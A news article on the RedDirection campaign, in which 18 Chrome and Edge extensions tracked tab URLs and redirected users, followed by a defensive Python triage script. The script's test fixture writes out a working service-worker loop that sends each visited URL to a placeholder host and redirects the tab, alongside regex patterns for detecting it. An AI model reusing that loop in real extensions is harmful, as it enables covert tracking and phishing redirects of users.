A new and dangerous malware campaign has infected more than 2.3 million users across Google Chrome and Microsoft Edge through eighteen browser extensions. This campaign is called RedDirection and was discovered by cybersecurity researchers at Koi Security.
These extensions were not suspicious at all. They had Google’s verified badge, thousands of downloads, positive reviews, and were even featured on the official stores. But behind the scenes, they turned browsers into surveillance tools.
The campaign began with an extension called “Color Picker, Eyedropper — Geco colorpick”, which was fully functional and looked legitimate. It worked normally for years before a quiet version update turned it into malware.
After analyzing this extension’s command and control infrastructure, researchers found that it was just one part of a much larger operation. A total of 18 extensions—including emoji keyboards, video speed controllers, VPNs for Discord and TikTok, dark themes, and volume boosters—were carrying the same malicious code.
Each one had its own unique domain, giving the illusion of separate developers. But all of them were tied to one centralized attack infrastructure that worked across both Chrome and Edge browsers.
Every time a user opens a tab or visits a website, the extension captures the page URL and sends it to a remote server with a unique tracking ID. After getting a response, it redirects the user to a fake site. The malicious code hides in the extension’s background service worker, which quietly runs behind the scenes. The code is activated on every tabs.onUpdated event.
These redirects can lead users to fake Zoom pages that ask them to download a “critical update”, or to pages that push malicious software which in turn installs more malware. Sometimes the extensions also redirect users to phishing pages imitating bank websites.
One of the most dangerous aspects of this campaign is that the extensions were not malicious from day one. Many of them were clean and trusted for years. The malware was introduced through later version updates, which were silently installed without any warning. Because Google and Microsoft’s extension platforms auto-update extensions, most users had no idea their browsers had turned into a tracking and redirection tool.
Some of the known extensions involved in the RedDirection campaign include:
- Color Picker, Eyedropper — Geco colorpick
- Video Speed Controller
- Unlock Discord
- Dark Theme
- Volume Max
- Emoji Keyboard Online
- Free Weather Forecast
- Unlock YouTube VPN
- SearchGPT – ChatGPT for Search
- Youtube Unblocked
- Web Sound Equalizer
- Flash Player Emulator
Each one offered useful features and actually delivered them while also implementing hidden hijacking code.
For a full list of compromised extension IDs and domains used by the malware, see the Koi Security report.
If you have installed any of these extensions, remove them immediately and clear your browser history and site data. I also advise running a full malware scan and reviewing all your extensions carefully. Koi Security has also provided Indicators of Compromise (IOCs) to help detect the malware, including extension IDs and malicious server domains.
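The hijack loop described above (a background service worker that reacts to tabs.onUpdated, reports the URL to a server, and then redirects the tab) and the clean-up advice here both come down to the same defender task: look at what is actually installed on disk. The following triage script is an added example and is not code from the article, from Koi Security, or from the RedDirection extensions. It walks the unpacked-extension folders of Chrome and Edge, flags any extension whose ID appears in a caller-supplied IOC list, and separately flags any extension whose manifest declares a background service worker plus the "tabs" permission when that worker combines a tabs.onUpdated listener, an outbound fetch() and a tabs.update() redirect. The profile paths are the usual defaults and are an assumption for other setups; the two extensions it scans in demo() are constructed fixtures with placeholder IDs, not real extensions, and the real IOC extension IDs must be taken from the Koi Security report and passed on the command line.

```python
# Extension triage script (added example; not the article's, Koi Security's, or
# the malware's code). Heuristic: IOC ID match, or service worker + "tabs"
# permission + (tabs.onUpdated listener, fetch(), tabs.update()) in one file.
import json
import os
import re
import sys
import tempfile
from pathlib import Path

# Behavioural markers drawn from the article's description of the hijack loop.
MARKERS = {
    "on_updated": re.compile(r"tabs\.onUpdated\.addListener"),
    "fetch": re.compile(r"\bfetch\s*\("),
    "redirect": re.compile(r"tabs\.update\s*\("),
}


def default_extension_roots():
    """'Extensions' folders of the Chrome and Edge default profiles (assumed paths)."""
    home = Path.home()
    if sys.platform.startswith("win"):
        base = Path(os.environ.get("LOCALAPPDATA", str(home / "AppData" / "Local")))
        return [base / "Google/Chrome/User Data/Default/Extensions",
                base / "Microsoft/Edge/User Data/Default/Extensions"]
    if sys.platform == "darwin":
        return [home / "Library/Application Support/Google/Chrome/Default/Extensions",
                home / "Library/Application Support/Microsoft Edge/Default/Extensions"]
    return [home / ".config/google-chrome/Default/Extensions",
            home / ".config/microsoft-edge/Default/Extensions"]


def triage_extension(version_dir, ioc_ids):
    """Inspect one <ext_id>/<version>/ directory and return a finding dict."""
    manifest = json.loads((version_dir / "manifest.json").read_text(encoding="utf-8"))
    ext_id = version_dir.parent.name  # Chrome/Edge name the folder after the extension ID
    finding = {"id": ext_id, "name": manifest.get("name", "?"),
               "version": manifest.get("version", "?"),
               "ioc_match": ext_id in ioc_ids, "markers": [], "suspicious": False}
    worker = manifest.get("background", {}).get("service_worker")
    if worker and "tabs" in manifest.get("permissions", []):
        src_path = version_dir / worker
        if src_path.is_file():
            src = src_path.read_text(encoding="utf-8", errors="replace")
            finding["markers"] = [k for k, rx in MARKERS.items() if rx.search(src)]
            # All three markers together form the capture-report-redirect loop.
            finding["suspicious"] = len(finding["markers"]) == len(MARKERS)
    return finding


def scan_roots(roots, ioc_ids):
    """Walk every <root>/<ext_id>/<version>/manifest.json and triage it."""
    findings = []
    for root in roots:
        root = Path(root)
        if not root.is_dir():
            continue
        for manifest in sorted(root.glob("*/*/manifest.json")):
            try:
                findings.append(triage_extension(manifest.parent, ioc_ids))
            except (OSError, ValueError):
                continue  # unreadable or malformed manifest: skip, do not abort the scan
    return findings


# Constructed fixtures (not real extensions) so the script can be exercised offline.
HIJACK_WORKER = """
chrome.tabs.onUpdated.addListener((tabId, info, tab) => {
  if (info.status !== "complete") return;
  fetch("https://example.invalid/r?u=" + encodeURIComponent(tab.url))
    .then(r => r.json()).then(d => { if (d.url) chrome.tabs.update(tabId, { url: d.url }); });
});
"""
BENIGN_WORKER = """
chrome.tabs.onUpdated.addListener((tabId, info) => { console.log(tabId, info.status); });
"""


def build_fixture(root, ext_id, worker_src):
    """Write a minimal MV3 extension under root/<ext_id>/1.0.0/ and return that directory."""
    vdir = Path(root) / ext_id / "1.0.0"
    vdir.mkdir(parents=True)
    manifest = {"manifest_version": 3, "name": "Sample Color Picker", "version": "1.0.0",
                "permissions": ["tabs"], "background": {"service_worker": "worker.js"}}
    (vdir / "manifest.json").write_text(json.dumps(manifest), encoding="utf-8")
    (vdir / "worker.js").write_text(worker_src, encoding="utf-8")
    return vdir


def demo():
    """Scan two constructed extensions: one behavioural hit, one IOC-list hit."""
    with tempfile.TemporaryDirectory() as tmp:
        build_fixture(tmp, "a" * 32, HIJACK_WORKER)
        build_fixture(tmp, "b" * 32, BENIGN_WORKER)
        return scan_roots([tmp], {"b" * 32})  # placeholder IOC ID, not a real one


if __name__ == "__main__":
    ioc = set(sys.argv[1:])  # extension IDs from the Koi Security IOC list go here
    for f in scan_roots(default_extension_roots(), ioc):
        if f["ioc_match"] or f["suspicious"]:
            print(f"{f['id']} {f['name']} {f['version']} ioc={f['ioc_match']} markers={f['markers']}")
```

Run it as `python triage.py <ioc-extension-id> ...` on the machine being checked. A behavioural hit is only a lead for manual review, since a legitimate extension can also watch tabs, call fetch and navigate; the combination is what makes it worth opening the worker source. An IOC match, by contrast, is a direct hit and the extension should be removed as the article advises.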
This campaign highlights a critical failure in how browser extension marketplaces operate. RedDirection is not just another attack. It is a supply chain-level failure, where trust signals meant to protect users were used against them. Over 2.3 million users have unknowingly been tracked, redirected, or exposed to attacks simply by installing what looked like trusted browser tools.